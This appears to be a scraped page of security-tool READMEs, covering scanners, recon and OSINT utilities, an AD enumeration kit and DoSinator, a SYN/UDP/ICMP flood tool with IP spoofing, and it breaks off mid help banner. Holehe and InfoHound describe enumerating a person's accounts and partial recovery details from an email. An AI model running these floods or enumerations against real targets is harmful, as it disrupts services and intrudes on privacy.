If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats. 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

packets to send (default: 500). -ps PACKET_SIZE, --packet_size PACKET_SIZE Packet size in bytes (default: 64). -ar ATTACK_RATE, --attack_rate ATTACK_RATE Attack rate in packets per second (default: 10). -d DURATION, --duration DURATION Duration of the attack in seconds. -am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns} Attack mode (default: syn). -sp SPOOF_IP, --spoof-ip SPOOF_IP Spoof IP address. --data DATA Custom data string to send." dir="auto">
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

By: Zion3R


Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


Installation

From Git

git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 analyzer.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

Warning : If you want to run a Docker container, associated threat analyzer recommends to use your malicious IPs and domains lists, because maintainer may not be update a default malicious IP and domain lists on docker image.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d target-web.com

From DockerHub

docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d target-web.com

Usage

-d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json

DONE

  • First-level depth scan your domain address.

TODO list

  • Third-level or the more depth static files scanning for target web application.
Other linked github project. You can take a look.
Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence v1.1.1 collects static files

https://github.com/OsmanKandemir/indicator-intelligence

Default Malicious IPs and Domains Sources

https://github.com/stamparm/blackbook

https://github.com/stamparm/ipsum

Development and Contribution

See; CONTRIBUTING.md



Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

By: Zion3R


A Pin Tool for tracing:


Bypasses the anti-tracing check based on RDTSC.

Generates a report in a .tag format (which can be loaded into other analysis tools):

RVA;traced event

i.e.

345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
...

How to build

On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer tiny_runner.sh for more information. Detailed description available here.

Usage

 Details about the usage you will find on the project's Wiki.

WARNINGS

  • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
  • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
  • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.


Questions? Ideas? Join Discussions!



Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

By: Zion3R

Holehe Online Version

Summary

Efficiently finding registered accounts from emails.

Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


Installation

With PyPI

pip3 install holehe

With Github

git clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install

Quick Start

Holehe can be run from the CLI and rapidly embedded within existing python applications.

 CLI Example

holehe test@gmail.com

 Python Example

import trio
import httpx

from holehe.modules.social_media.snapchat import snapchat


async def main():
email = "test@gmail.com"
out = []
client = httpx.AsyncClient()

await snapchat(email, client, out)

print(out)
await client.aclose()

trio.run(main)

Module Output

For each module, data is returned in a standard dictionary with the following json-equivalent format :

{
"name": "example",
"rateLimit": false,
"exists": true,
"emailrecovery": "ex****e@gmail.com",
"phoneNumber": "0*******78",
"others": null
}
  • rateLitmit : Lets you know if you've been rate-limited.
  • exists : If an account exists for the email on that service.
  • emailrecovery : Sometimes partially obfuscated recovery emails are returned.
  • phoneNumber : Sometimes partially obfuscated recovery phone numbers are returned.
  • others : Any extra info.

Rate limit? Change your IP.

Maltego Transform : Holehe Maltego

Thank you to :

Donations

For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

 License

GNU General Public License v3.0

Built for educational purposes only.

Modules

Name Domain Method Frequent Rate Limit
aboutme about.me register
adobe adobe.com password recovery
amazon amazon.com login
amocrm amocrm.com register
anydo any.do login
archive archive.org register
armurerieauxerre armurerie-auxerre.com register
atlassian atlassian.com register
axonaut axonaut.com register
babeshows babeshows.co.uk register
badeggsonline badeggsonline.com register
biosmods bios-mods.com register
biotechnologyforums biotechnologyforums.com register
bitmoji bitmoji.com login
blablacar blablacar.com register
blackworldforum blackworldforum.com register
blip blip.fm register
blitzortung forum.blitzortung.org register
bluegrassrivals bluegrassrivals.com register
bodybuilding bodybuilding.com register
buymeacoffee buymeacoffee.com register
cambridgemt discussion.cambridge-mt.com register
caringbridge caringbridge.org register
chinaphonearena chinaphonearena.com register
clashfarmer clashfarmer.com register
codecademy codecademy.com register
codeigniter forum.codeigniter.com register
codepen codepen.io register
coroflot coroflot.com register
cpaelites cpaelites.com register
cpahero cpahero.com register
cracked_to cracked.to register
crevado crevado.com register
deliveroo deliveroo.com register
demonforums demonforums.net register
devrant devrant.com register
diigo diigo.com register
discord discord.com register
docker docker.com register
dominosfr dominos.fr register
ebay ebay.com login
ello ello.co register
envato envato.com register
eventbrite eventbrite.com login
evernote evernote.com login
fanpop fanpop.com register
firefox firefox.com register
flickr flickr.com login
freelancer freelancer.com register
freiberg drachenhort.user.stunet.tu-freiberg.de register
garmin garmin.com register
github github.com register
google google.com register
gravatar gravatar.com other
hubspot hubspot.com login
imgur imgur.com register
insightly insightly.com login
instagram instagram.com register
issuu issuu.com register
koditv forum.kodi.tv register
komoot komoot.com register
laposte laposte.fr register
lastfm last.fm register
lastpass lastpass.com register
mail_ru mail.ru password recovery
mybb community.mybb.com register
myspace myspace.com register
nattyornot nattyornotforum.nattyornot.com register
naturabuy naturabuy.fr register
ndemiccreations forum.ndemiccreations.com register
nextpvr forums.nextpvr.com register
nike nike.com register
nimble nimble.com register
nocrm nocrm.io register
nutshell nutshell.com register
odnoklassniki ok.ru password recovery
office365 office365.com other
onlinesequencer onlinesequencer.net register
parler parler.com login
patreon patreon.com login
pinterest pinterest.com register
pipedrive pipedrive.com register
plurk plurk.com register
pornhub pornhub.com register
protonmail protonmail.ch other
quora quora.com register
rambler rambler.ru register
redtube redtube.com register
replit replit.com register
rocketreach rocketreach.co register
samsung samsung.com register
seoclerks seoclerks.com register
sevencups 7cups.com register
smule smule.com register
snapchat snapchat.com login
soundcloud soundcloud.com register
sporcle sporcle.com register
spotify spotify.com register
strava strava.com register
taringa taringa.net register
teamleader teamleader.com register
teamtreehouse teamtreehouse.com register
tellonym tellonym.me register
thecardboard thecardboard.org register
therianguide forums.therian-guide.com register
thevapingforum thevapingforum.com register
tumblr tumblr.com register
tunefind tunefind.com register
twitter twitter.com register
venmo venmo.com register
vivino vivino.com register
voxmedia voxmedia.com register
vrbo vrbo.com register
vsco vsco.co register
wattpad wattpad.com register
wordpress wordpress login
xing xing.com register
xnxx xnxx.com register
xvideos xvideos.com register
yahoo yahoo.com login
zoho zoho.com login


AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment

By: Zion3R


Description

Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.

The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.

Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî


Features

  • Enumerate and gather information about AD domains, users, groups, and computers.
  • Check trust relationships between domains.
  • List all objects inside a specific Organizational Unit (OU).
  • Retrieve information about the currently logged-in user.
  • Perform various operations related to local users and groups.
  • Configure firewall rules and enable Remote Desktop (RDP).
  • Connect to remote machines using RDP.
  • Gather network and security information.
  • Check Windows Defender status and exclusions configured via GPO.
  • ...and more!

Usage

  1. Clone the repository or download the scripts as needed.
  2. Run the PowerShell script using the appropriate PowerShell environment.
  3. Follow the on-screen prompts to provide domain, username, and password when required.
  4. Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!

Disclaimer

The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.

License

This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.

Cyber Security Consultant

Alperen Ugurlu



Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦

$ https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

By: Zion3R


This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


The Developers

Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

Overview

The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.


After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.


Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.


Files panel will display all the files from the current pentest. A team member can upload and download those files.


Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


PreReport panel will contain all the screenshots from the current pentest.


Graph panel will contain all of the Users and Servers and the relationship between them.


APIs allow users to effortlessly retrieve data by making simple API requests.


curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq

Installation

Docker

Pull from GitHub container registry.

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d

Start/Stop the container

sudo docker-compose start/stop

Save/Load Redeye

docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar

GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

Source

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe

General

Redeye will listen on: http://0.0.0.0:8443
Default Credentials:

  • username: redeye
  • password: redeye

Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:

  • username: neo4j
  • password: redeye

Special-Thanks

  • Yoav Danino for mental support and beta testing.

Credits

If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


Features

  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xcrawl3r.git 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Usage

To display help message for xcrawl3r use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

USAGE:
xcrawl3r [OPTIONS]

INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.

Credits



Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
